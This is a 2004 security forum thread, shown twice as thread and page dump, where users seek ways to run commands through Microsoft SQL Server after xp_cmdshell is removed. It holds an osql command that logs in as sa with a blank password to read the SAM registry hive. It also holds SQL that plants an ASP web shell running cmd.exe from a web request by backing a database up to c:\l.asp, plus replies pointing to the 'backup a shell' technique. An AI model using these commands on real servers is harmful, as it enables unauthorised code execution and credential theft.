Mssql Shell

GovernmentSecurity.org > System Security > Windows Systems

c°h°

Oct 4 2004, 01:22 PM

Hi, is there a way to execute something per mssql if u drop xp_cmdshell and deny the use of sp_addextendedproc?

If so plz gimme some hints

tia

Phil

Oct 5 2004, 05:53 AM

search the board there are already some "hints" and tuts for that

c°h°

Oct 5 2004, 09:50 AM

Do u mean that :

osql.exe -S 123.123.123.123 -U sa -P "" -Q "USE master EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'"

and in this key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6.5

the password of the SA user is stored in plain text

cause i dont get this to work maybe there are some different reg keys 4 different mssql versions ?

THX 4 any kind of ideas

woodpecker.boboo

Oct 5 2004, 04:11 PM

QUOTE(c°h° @ Oct 4 2004, 08:22 AM)

Hi, is there a way to execute something per mssql if u drop xp_cmdshell and deny the use of sp_addextendedproc?

If so plz gimme some hints

tia

backup a shell
or
WebTask a shell

have fun

c°h°

Oct 6 2004, 08:34 AM

backup a shell / webtask a shell is looking really interresting but i could only find chinese sites about that

Does anone have an english startpoint 4 that ?

so far i tried :

use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='c:\l.asp';

and then connect to ip\l.asp but i am not groupmember of the model table so i cant do it like that.

tia

B3T4

Oct 8 2004, 12:27 PM

QUOTE(c°h° @ Oct 6 2004, 08:34 AM)

use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='c:\l.asp';

and then connect to ip\l.asp but i am not groupmember of the model table so i cant do it like that.

tia

try : use master
create...

c°h°

Oct 9 2004, 09:54 AM

to user master u need dbo rights :/ the model way may grant this rights to any user.

But i dont get it to work

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.


Help - Search - Member List - Calendar Full Version: Mssql Shell GovernmentSecurity.org > System Security > Windows Systems c°h° Oct 4 2004, 01:22 PM Hi, is there a way to execute something per mssql if u drop xp_cmdshell and deny the use of sp_addextendedproc? If so plz gimme some hints tia Phil Oct 5 2004, 05:53 AM search the board there are already some "hints" and tuts for that c°h° Oct 5 2004, 09:50 AM Do u mean that : osql.exe -S 123.123.123.123 -U sa -P "" -Q "USE master EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'" and in this key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6.5 the password of the SA user is stored in plain text cause i dont get this to work maybe there are some different reg keys 4 different mssql versions ? THX 4 any kind of ideas woodpecker.boboo Oct 5 2004, 04:11 PM QUOTE(c°h° @ Oct 4 2004, 08:22 AM) Hi, is there a way to execute something per mssql if u drop xp_cmdshell and deny the use of sp_addextendedproc? If so plz gimme some hints tia backup a shell or WebTask a shell have fun c°h° Oct 6 2004, 08:34 AM backup a shell / webtask a shell is looking really interresting but i could only find chinese sites about that Does anone have an english startpoint 4 that ? so far i tried : use model create table cmd(str image); insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>'); backup database model to disk='c:\l.asp'; and then connect to ip\l.asp but i am not groupmember of the model table so i cant do it like that. tia B3T4 Oct 8 2004, 12:27 PM QUOTE(c°h° @ Oct 6 2004, 08:34 AM) use model create table cmd(str image); insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>'); backup database model to disk='c:\l.asp'; and then connect to ip\l.asp but i am not groupmember of the model table so i cant do it like that. tia try : use master create... c°h° Oct 9 2004, 09:54 AM to user master u need dbo rights :/ the model way may grant this rights to any user. But i dont get it to work This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.